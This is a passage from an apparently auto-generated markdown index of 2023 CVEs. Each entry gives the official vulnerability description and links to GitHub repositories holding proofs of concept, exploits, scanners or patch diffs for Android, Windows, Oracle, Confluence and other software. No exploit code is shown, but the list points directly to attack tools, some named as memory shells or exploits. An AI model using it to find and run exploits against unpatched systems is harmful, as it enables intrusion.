- [qixils/AntiCropalypse](https://github.com/qixils/AntiCropalypse)
- [infobyte/CVE-2023-21036](https://github.com/infobyte/CVE-2023-21036)
- [notaSWE/gocropalypse](https://github.com/notaSWE/gocropalypse)
- [lordofpipes/acropadetect](https://github.com/lordofpipes/acropadetect)
### CVE-2023-21086 (2023-04-19)
In isToggleable of SecureNfcEnabler.java and SecureNfcPreferenceController.java, there is a possible way to enable NFC from a secondary account due to a permissions bypass. This could lead to local escalation of privilege from the Guest account with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-238298970
- [Trinadh465/packages_apps_Settings_CVE-2023-21086](https://github.com/Trinadh465/packages_apps_Settings_CVE-2023-21086)
### CVE-2023-21094 (2023-04-19)
In sanitize of LayerState.cpp, there is a possible way to take over the screen display and swap the display content due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-248031255
- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21094)
### CVE-2023-21097 (2023-04-19)
In toUriInner of Intent.java, there is a possible way to launch an arbitrary activity due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261858325
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21097)
- [uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097](https://github.com/uthrasri/frameworks_base_AOSP10_r33_CVE-2023-21097)
### CVE-2023-21109 (2023-05-15)
In multiple places of AccessibilityService, there is a possible way to hide the app from the user due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-261589597
- [Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_](https://github.com/Trinadh465/frameworks_base_AOSP10_CVE-2023-21109r33_)
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21109)
### CVE-2023-21118 (2023-05-15)
In unflattenString8 of Sensor.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-269014004
- [Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118](https://github.com/Trinadh465/frameworks_native_AOSP-10_r33_CVE-2023-21118)
- [Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118](https://github.com/Satheesh575555/frameworks_native_AOSP10_r33_CVE-2023-21118)
### CVE-2023-21144 (2023-06-15)
In doInBackground of NotificationContentInflater.java, there is a possible temporary denial or service due to long running operations. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-11 Android-12 Android-12L Android-13Android ID: A-252766417
- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144_old)
- [hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144](https://github.com/hshivhare67/Framework_base_AOSP10_r33_CVE-2023-21144)
### CVE-2023-21238 (2023-07-12)
In visitUris of RemoteViews.java, there is a possible leak of images between users due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21238)
### CVE-2023-21246 (2023-07-12)
In ShortcutInfo of ShortcutInfo.java, there is a possible way for an app to retain notification listening access due to an uncaught exception. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21246)
### CVE-2023-21251 (2023-07-12)
In onCreate of ConfirmDialog.java, there is a possible way to connect to VNP bypassing user's consent due to improper input validation. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation.\n\n
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21251)
### CVE-2023-21272 (2023-08-14)
In readFrom of Uri.java, there is a possible bad URI permission grant due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272](https://github.com/Trinadh465/frameworks_base_AOSP-4.2.2_r1_CVE-2023-21272)
- [pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272](https://github.com/pazhanivel07/platform_frameworks_base_AOSP_10_r33_CVE-2023-21272)
### CVE-2023-21275 (2023-08-14)
In decideCancelProvisioningDialog of AdminIntegratedFlowPrepareActivity.java, there is a possible way to bypass factory reset protections due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275](https://github.com/Trinadh465/packages_apps_ManagedProvisioning_AOSP10_r33_CVE-2023-21275)
### CVE-2023-21281 (2023-08-14)
In multiple functions of KeyguardViewMediator.java, there is a possible failure to lock after screen timeout due to a logic error in the code. This could lead to local escalation of privilege across users with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/platform_frameworks_base_CVE-2023-21281](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21281)
### CVE-2023-21282 (2023-08-14)
In TRANSPOSER_SETTINGS of lpp_tran.h, there is a possible out of bounds write due to an incorrect bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation.\n\n
- [Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282](https://github.com/Trinadh465/external_aac_AOSP10_r33_CVE-2023-21282)
- [Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282](https://github.com/Trinadh465/external_aac_android-4.2.2_r1_CVE-2023-21282)
### CVE-2023-21284 (2023-08-14)
In multiple functions of DevicePolicyManager.java, there is a possible way to prevent enabling the Find my Device feature due to improper input validation. This could lead to local denial of service with User execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284](https://github.com/Trinadh465/frameworks_base_AOSP10_r33_CVE-2023-21284)
### CVE-2023-21285 (2023-08-14)
In setMetadata of MediaSessionRecord.java, there is a possible way to view another user's images due to a confused deputy. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [uthrasri/framework_base_CVE-2023-21285_NoPatch](https://github.com/uthrasri/framework_base_CVE-2023-21285_NoPatch)
### CVE-2023-21286 (2023-08-14)
In visitUris of RemoteViews.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/platform_frameworks_base_CVE-2023-21286](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21286)
### CVE-2023-21288 (2023-08-14)
In visitUris of Notification.java, there is a possible way to reveal images across users due to a missing permission check. This could lead to local information disclosure with User execution privileges needed. User interaction is not needed for exploitation.\n\n
- [Trinadh465/platform_frameworks_base_CVE-2023-21288](https://github.com/Trinadh465/platform_frameworks_base_CVE-2023-21288)
### CVE-2023-21554 (2023-04-11)
Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
- [zoemurmure/CVE-2023-21554-PoC](https://github.com/zoemurmure/CVE-2023-21554-PoC)
- [3tternp/CVE-2023-21554](https://github.com/3tternp/CVE-2023-21554)
### CVE-2023-21560 (2023-01-10)
Windows Boot Manager Security Feature Bypass Vulnerability
- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk)
### CVE-2023-21608 (2023-01-18)
Adobe Acrobat Reader versions 22.003.20282 (and earlier), 22.003.20281 (and earlier) and 20.005.30418 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.
- [hacksysteam/CVE-2023-21608](https://github.com/hacksysteam/CVE-2023-21608)
- [Malwareman007/CVE-2023-21608](https://github.com/Malwareman007/CVE-2023-21608)
### CVE-2023-21674 (2023-01-10)
Windows Advanced Local Procedure Call (ALPC) Elevation of Privilege Vulnerability
- [hd3s5aa/CVE-2023-21674](https://github.com/hd3s5aa/CVE-2023-21674)
### CVE-2023-21707 (2023-02-14)
Microsoft Exchange Server Remote Code Execution Vulnerability
- [N1k0la-T/CVE-2023-21707](https://github.com/N1k0la-T/CVE-2023-21707)
### CVE-2023-21716 (2023-02-14)
Microsoft Word Remote Code Execution Vulnerability
- [FeatherStark/CVE-2023-21716](https://github.com/FeatherStark/CVE-2023-21716)
- [Xnuvers007/CVE-2023-21716](https://github.com/Xnuvers007/CVE-2023-21716)
- [gyaansastra/CVE-2023-21716](https://github.com/gyaansastra/CVE-2023-21716)
- [mikesxrs/CVE-2023-21716_YARA_Results](https://github.com/mikesxrs/CVE-2023-21716_YARA_Results)
- [3yujw7njai/CVE-2023-21716-POC](https://github.com/3yujw7njai/CVE-2023-21716-POC)
- [hv0l/CVE-2023-21716_exploit](https://github.com/hv0l/CVE-2023-21716_exploit)
- [JMousqueton/CVE-2023-21716](https://github.com/JMousqueton/CVE-2023-21716)
- [Lord-of-the-IoT/CVE-2023-21716](https://github.com/Lord-of-the-IoT/CVE-2023-21716)
- [MojithaR/CVE-2023-21716-EXPLOIT.py](https://github.com/MojithaR/CVE-2023-21716-EXPLOIT.py)
- [n0s3ns33/poc-cve-2023-21716](https://github.com/n0s3ns33/poc-cve-2023-21716)
### CVE-2023-21739 (2023-01-10)
Windows Bluetooth Driver Elevation of Privilege Vulnerability
- [gmh5225/CVE-2023-21739](https://github.com/gmh5225/CVE-2023-21739)
### CVE-2023-21742 (2023-01-10)
Microsoft SharePoint Server Remote Code Execution Vulnerability
- [ohnonoyesyes/CVE-2023-21742](https://github.com/ohnonoyesyes/CVE-2023-21742)
### CVE-2023-21746 (2023-01-10)
Windows NTLM Elevation of Privilege Vulnerability
- [Muhammad-Ali007/LocalPotato_CVE-2023-21746](https://github.com/Muhammad-Ali007/LocalPotato_CVE-2023-21746)
### CVE-2023-21752 (2023-01-10)
Windows Backup Service Elevation of Privilege Vulnerability
- [Wh04m1001/CVE-2023-21752](https://github.com/Wh04m1001/CVE-2023-21752)
- [yosef0x01/CVE-2023-21752](https://github.com/yosef0x01/CVE-2023-21752)
### CVE-2023-21766 (2023-01-10)
Windows Overlay Filter Information Disclosure Vulnerability
- [Y3A/cve-2023-21766](https://github.com/Y3A/cve-2023-21766)
### CVE-2023-21768 (2023-01-10)
Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
- [chompie1337/Windows_LPE_AFD_CVE-2023-21768](https://github.com/chompie1337/Windows_LPE_AFD_CVE-2023-21768)
- [cl4ym0re/cve-2023-21768-compiled](https://github.com/cl4ym0re/cve-2023-21768-compiled)
- [SamuelTulach/nullmap](https://github.com/SamuelTulach/nullmap)
- [Malwareman007/CVE-2023-21768](https://github.com/Malwareman007/CVE-2023-21768)
- [HKxiaoli/Windows_AFD_LPE_CVE-2023-21768](https://github.com/HKxiaoli/Windows_AFD_LPE_CVE-2023-21768)
- [3yujw7njai/CVE-2023-21768-POC](https://github.com/3yujw7njai/CVE-2023-21768-POC)
- [h1bAna/CVE-2023-21768](https://github.com/h1bAna/CVE-2023-21768)
- [zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit](https://github.com/zoemurmure/CVE-2023-21768-AFD-for-WinSock-EoP-exploit)
- [Rosayxy/Recreate-cve-2023-21768](https://github.com/Rosayxy/Recreate-cve-2023-21768)
- [ldrx30/CVE-2023-21768](https://github.com/ldrx30/CVE-2023-21768)
- [xboxoneresearch/CVE-2023-21768-dotnet](https://github.com/xboxoneresearch/CVE-2023-21768-dotnet)
### CVE-2023-21823 (2023-02-14)
Windows Graphics Component Remote Code Execution Vulnerability
- [Elizarfish/CVE-2023-21823](https://github.com/Elizarfish/CVE-2023-21823)
### CVE-2023-21837 (2023-01-17)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [hktalent/CVE-2023-21837](https://github.com/hktalent/CVE-2023-21837)
### CVE-2023-21839 (2023-01-17)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [DXask88MA/Weblogic-CVE-2023-21839](https://github.com/DXask88MA/Weblogic-CVE-2023-21839)
- [ASkyeye/CVE-2023-21839](https://github.com/ASkyeye/CVE-2023-21839)
- [Firebasky/CVE-2023-21839](https://github.com/Firebasky/CVE-2023-21839)
- [houqe/POC_CVE-2023-21839](https://github.com/houqe/POC_CVE-2023-21839)
- [kw3h4/CVE-2023-21839-metasploit-scanner](https://github.com/kw3h4/CVE-2023-21839-metasploit-scanner)
- [Romanc9/Gui-poc-test](https://github.com/Romanc9/Gui-poc-test)
- [dinosn/CVE-2024-20931](https://github.com/dinosn/CVE-2024-20931)
### CVE-2023-21887 (2023-01-17)
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: GIS). Supported versions that are affected are 8.0.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
- [zwxxb/CVE-2023-21887](https://github.com/zwxxb/CVE-2023-21887)
### CVE-2023-21931 (2023-04-18)
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N).
- [TimeSHU/weblogic_CVE-2023-21931_POC-EXP](https://github.com/TimeSHU/weblogic_CVE-2023-21931_POC-EXP)
### CVE-2023-21939 (2023-04-18)
Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: Swing). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).
- [Y4Sec-Team/CVE-2023-21939](https://github.com/Y4Sec-Team/CVE-2023-21939)
### CVE-2023-21971 (2023-04-18)
Vulnerability in the MySQL Connectors product of Oracle MySQL (component: Connector/J). Supported versions that are affected are 8.0.32 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Connectors as well as unauthorized update, insert or delete access to some of MySQL Connectors accessible data and unauthorized read access to a subset of MySQL Connectors accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:H).
- [Avento/CVE-2023-21971_Analysis](https://github.com/Avento/CVE-2023-21971_Analysis)
### CVE-2023-21987 (2023-04-18)
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.44 and Prior to 7.0.8. Difficult to exploit vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H).
- [chunzhennn/cve-2023-21987-poc](https://github.com/chunzhennn/cve-2023-21987-poc)
### CVE-2023-22074 (2023-10-17)
Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.20 and 21.3-21.11. Easily exploitable vulnerability allows high privileged attacker having Create Session, Select Any Dictionary privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L).
- [emad-almousa/CVE-2023-22074](https://github.com/emad-almousa/CVE-2023-22074)
### CVE-2023-22098 (2023-10-17)
Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 7.0.12. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: Only applicable to 7.0.x platform. CVSS 3.1 Base Score 8.2 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H).
- [Diego-AltF4/CVE-2023-22098](https://github.com/Diego-AltF4/CVE-2023-22098)
### CVE-2023-22432 (2023-03-05)
Open redirect vulnerability exists in web2py versions prior to 2.23.1. When using the tool, a web2py user may be redirected to an arbitrary website by accessing a specially crafted URL. As a result, the user may become a victim of a phishing attack.
- [aeyesec/CVE-2023-22432](https://github.com/aeyesec/CVE-2023-22432)
### CVE-2023-22490 (2023-02-14)
Git is a revision control system. Using a specially-crafted repository, Git prior to versions 2.39.2, 2.38.4, 2.37.6, 2.36.5, 2.35.7, 2.34.7, 2.33.7, 2.32.6, 2.31.7, and 2.30.8 can be tricked into using its local clone optimization even when using a non-local transport. Though Git will abort local clones whose source `$GIT_DIR/objects` directory contains symbolic links, the `objects` directory itself may still be a symbolic link. These two may be combined to include arbitrary files based on known paths on the victim's filesystem within the malicious repository's working copy, allowing for data exfiltration in a similar manner as CVE-2022-39253.\n\nA fix has been prepared and will appear in v2.39.2 v2.38.4 v2.37.6 v2.36.5 v2.35.7 v2.34.7 v2.33.7 v2.32.6, v2.31.7 and v2.30.8. If upgrading is impractical, two short-term workarounds are available. Avoid cloning repositories from untrusted sources with `--recurse-submodules`. Instead, consider cloning repositories without recursively cloning their submodules, and instead run `git submodule update` at each layer. Before doing so, inspect each new `.gitmodules` file to ensure that it does not contain suspicious module URLs.
- [smash8tap/CVE-2023-22490_PoC](https://github.com/smash8tap/CVE-2023-22490_PoC)
### CVE-2023-22515 (2023-10-04)
Atlassian has been made aware of an issue reported by a handful of customers where external attackers may have exploited a previously unknown vulnerability in publicly accessible Confluence Data Center and Server instances to create unauthorized Confluence administrator accounts and access Confluence instances. \r\n\r\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
- [ErikWynter/CVE-2023-22515-Scan](https://github.com/ErikWynter/CVE-2023-22515-Scan)
- [j3seer/CVE-2023-22515-POC](https://github.com/j3seer/CVE-2023-22515-POC)
- [Chocapikk/CVE-2023-22515](https://github.com/Chocapikk/CVE-2023-22515)
- [ad-calcium/CVE-2023-22515](https://github.com/ad-calcium/CVE-2023-22515)
- [kh4sh3i/CVE-2023-22515](https://github.com/kh4sh3i/CVE-2023-22515)
- [sincere9/CVE-2023-22515](https://github.com/sincere9/CVE-2023-22515)
- [Le1a/CVE-2023-22515](https://github.com/Le1a/CVE-2023-22515)
- [Vulnmachines/confluence-cve-2023-22515](https://github.com/Vulnmachines/confluence-cve-2023-22515)
- [iveresk/CVE-2023-22515](https://github.com/iveresk/CVE-2023-22515)
- [youcannotseemeagain/CVE-2023-22515_RCE](https://github.com/youcannotseemeagain/CVE-2023-22515_RCE)
- [DsaHen/cve-2023-22515-exp](https://github.com/DsaHen/cve-2023-22515-exp)
- [joaoviictorti/CVE-2023-22515](https://github.com/joaoviictorti/CVE-2023-22515)
- [C1ph3rX13/CVE-2023-22515](https://github.com/C1ph3rX13/CVE-2023-22515)
- [AIex-3/confluence-hack](https://github.com/AIex-3/confluence-hack)
- [LucasPDiniz/CVE-2023-22515](https://github.com/LucasPDiniz/CVE-2023-22515)
- [aaaademo/Confluence-EvilJar](https://github.com/aaaademo/Confluence-EvilJar)
- [edsonjt81/CVE-2023-22515-Scan.](https://github.com/edsonjt81/CVE-2023-22515-Scan.)
- [INTfinityConsulting/cve-2023-22515](https://github.com/INTfinityConsulting/cve-2023-22515)
- [CalegariMindSec/Exploit-CVE-2023-22515](https://github.com/CalegariMindSec/Exploit-CVE-2023-22515)
- [rxerium/CVE-2023-22515](https://github.com/rxerium/CVE-2023-22515)
- [fyx1t/NSE--CVE-2023-22515](https://github.com/fyx1t/NSE--CVE-2023-22515)
- [s1d6point7bugcrowd/CVE-2023-22515-check](https://github.com/s1d6point7bugcrowd/CVE-2023-22515-check)
- [xorbbo/cve-2023-22515](https://github.com/xorbbo/cve-2023-22515)
- [spareack/CVE-2023-22515-NSE](https://github.com/spareack/CVE-2023-22515-NSE)
- [Onedy1703/CVE-2023-22515](https://github.com/Onedy1703/CVE-2023-22515)
### CVE-2023-22518 (2023-10-31)
All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability. \n\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.
- [ForceFledgling/CVE-2023-22518](https://github.com/ForceFledgling/CVE-2023-22518)
- [davidfortytwo/CVE-2023-22518](https://github.com/davidfortytwo/CVE-2023-22518)
- [RevoltSecurities/CVE-2023-22518](https://github.com/RevoltSecurities/CVE-2023-22518)
- [0x0d3ad/CVE-2023-22518](https://github.com/0x0d3ad/CVE-2023-22518)
- [C1ph3rX13/CVE-2023-22518](https://github.com/C1ph3rX13/CVE-2023-22518)
- [bibo318/CVE-2023-22518](https://github.com/bibo318/CVE-2023-22518)
- [Lilly-dox/Exploit-CVE-2023-22518](https://github.com/Lilly-dox/Exploit-CVE-2023-22518)
- [zgimszhd61/CVE-2023-22518](https://github.com/zgimszhd61/CVE-2023-22518)
### CVE-2023-22524 (2023-12-06)
Certain versions of the Atlassian Companion App for MacOS were affected by a remote code execution vulnerability. An attacker could utilize WebSockets to bypass Atlassian Companion’s blocklist and MacOS Gatekeeper to allow execution of code.
- [imperva/CVE-2023-22524](https://github.com/imperva/CVE-2023-22524)
- [ron-imperva/CVE-2023-22524](https://github.com/ron-imperva/CVE-2023-22524)
### CVE-2023-22527 (2024-01-16)
A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian’s January Security Bulletin.
- [Avento/CVE-2023-22527_Confluence_RCE](https://github.com/Avento/CVE-2023-22527_Confluence_RCE)
- [Sudistark/patch-diff-CVE-2023-22527](https://github.com/Sudistark/patch-diff-CVE-2023-22527)
- [ga0we1/CVE-2023-22527_Confluence_RCE](https://github.com/ga0we1/CVE-2023-22527_Confluence_RCE)
- [Drun1baby/CVE-2023-22527](https://github.com/Drun1baby/CVE-2023-22527)
- [cleverg0d/CVE-2023-22527](https://github.com/cleverg0d/CVE-2023-22527)
- [thanhlam-attt/CVE-2023-22527](https://github.com/thanhlam-attt/CVE-2023-22527)
- [Manh130902/CVE-2023-22527-POC](https://github.com/Manh130902/CVE-2023-22527-POC)
- [VNCERT-CC/CVE-2023-22527-confluence](https://github.com/VNCERT-CC/CVE-2023-22527-confluence)
- [Vozec/CVE-2023-22527](https://github.com/Vozec/CVE-2023-22527)
- [C1ph3rX13/CVE-2023-22527](https://github.com/C1ph3rX13/CVE-2023-22527)
- [Niuwoo/CVE-2023-22527](https://github.com/Niuwoo/CVE-2023-22527)
- [Chocapikk/CVE-2023-22527](https://github.com/Chocapikk/CVE-2023-22527)
- [RevoltSecurities/CVE-2023-22527](https://github.com/RevoltSecurities/CVE-2023-22527)
- [yoryio/CVE-2023-22527](https://github.com/yoryio/CVE-2023-22527)
- [Privia-Security/CVE-2023-22527](https://github.com/Privia-Security/CVE-2023-22527)
- [MaanVader/CVE-2023-22527-POC](https://github.com/MaanVader/CVE-2023-22527-POC)
- [adminlove520/CVE-2023-22527](https://github.com/adminlove520/CVE-2023-22527)
- [YongYe-Security/CVE-2023-22527](https://github.com/YongYe-Security/CVE-2023-22527)
- [Boogipop/CVE-2023-22527-Godzilla-MEMSHELL](https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL)
- [M0untainShley/CVE-2023-22527-MEMSHELL](https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL)
- [vulncheck-oss/cve-2023-22527](https://github.com/vulncheck-oss/cve-2023-22527)
- [BBD-YZZ/Confluence-RCE](https://github.com/BBD-YZZ/Confluence-RCE)
- [kh4sh3i/CVE-2023-22527](https://github.com/kh4sh3i/CVE-2023-22527)
- [AxthonyV/CVE-2023-22527](https://github.com/AxthonyV/CVE-2023-22527)
### CVE-2023-22551 (2023-01-01)
The FTP (aka "Implementation of a simple FTP client and server") project through 96c1a35 allows remote attackers to cause a denial of service (memory consumption) by engaging in client activity, such as establishing and then terminating a connection. This occurs because malloc is used but free is not.
- [viswagb/CVE-2023-22551](https://github.com/viswagb/CVE-2023-22551)
### CVE-2023-22621 (2023-04-19)
Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution.
- [sofianeelhor/CVE-2023-22621-POC](https://github.com/sofianeelhor/CVE-2023-22621-POC)
### CVE-2023-22622 (2023-01-05)
WordPress through 6.1.1 depends on unpredictable client visits to cause wp-cron.php execution and the resulting security updates, and the source code describes "the scenario where a site may not receive enough visits to execute scheduled tasks in a timely manner," but neither the installation guide nor the security guide mentions this default behavior, or alerts the user about security risks on installations with very few visits.
- [michael-david-fry/CVE-2023-22622](https://github.com/michael-david-fry/CVE-2023-22622)
### CVE-2023-22726 (2023-01-20)
act is a project which allows for local running of github actions. The artifact server that stores artifacts from Github Action runs does not sanitize path inputs. This allows an attacker to download and overwrite arbitrary files on the host from a Github Action. This issue may lead to privilege escalation. The /upload endpoint is vulnerable to path traversal as filepath is user controlled, and ultimately flows into os.Mkdir and os.Open. The /artifact endpoint is vulnerable to path traversal as the path is variable is user controlled, and the specified file is ultimately returned by the server. This has been addressed in version 0.2.40. Users are advised to upgrade. Users unable to upgrade may, during implementation of Open and OpenAtEnd for FS, ensure to use ValidPath() to check against path traversal or clean the user-provided paths manually.
- [ProxyPog/POC-CVE-2023-22726](https://github.com/ProxyPog/POC-CVE-2023-22726)
### CVE-2023-22809 (2023-01-18)
